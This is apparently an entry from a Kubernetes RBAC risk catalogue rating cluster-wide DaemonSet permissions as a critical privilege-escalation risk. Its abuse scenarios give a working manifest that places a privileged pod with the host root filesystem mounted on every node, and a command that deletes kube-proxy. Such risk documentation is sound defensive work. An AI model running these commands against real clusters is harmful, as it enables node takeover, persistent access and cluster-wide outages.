Manage DaemonSets cluster-wide (runs on all nodes, high impact)
Elevation of Privilege
Critical
Overview
| Field | Value |
|---|---|
| ID | 1035 |
| Name | Manage DaemonSets cluster-wide (runs on all nodes, high impact) |
| Risk Category | Elevation of Privilege |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | apps |
| Resources | daemonsets |
| Verbs | create, update, patch, delete |
| Tags | NodeAccess Persistence PrivilegeEscalation Tampering WorkloadLifecycle |
Description
Permits creating, updating, or deleting DaemonSets across the cluster. DaemonSets ensure a pod runs on all (or selected) nodes. This is highly critical as it allows deploying privileged pods directly onto every node, leading to widespread node compromise, privilege escalation, and persistent access.
Abuse Scenarios
- Create a new DaemonSet that deploys a privileged pod on every node.
kubectl create -n <namespace> -f - <<EOF
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: privileged-daemonset
spec:
selector:
matchLabels:
app: privileged-ds
template:
metadata:
labels:
app: privileged-ds
spec:
hostNetwork: true
hostPID: true
containers:
- name: attacker
image: busybox
command: ["/bin/sh", "-c", "sleep infinity"]
securityContext:
privileged: true
volumeMounts:
- mountPath: /host
name: host-root
volumes:
- name: host-root
hostPath:
path: /
EOF
# Example: kubectl create -n kube-system -f - <<EOF ... EOF
- Delete a critical DaemonSet, disrupting cluster-wide services.
kubectl delete daemonset <daemonset-name> -n <namespace>
# Example: kubectl delete daemonset kube-proxy -n kube-system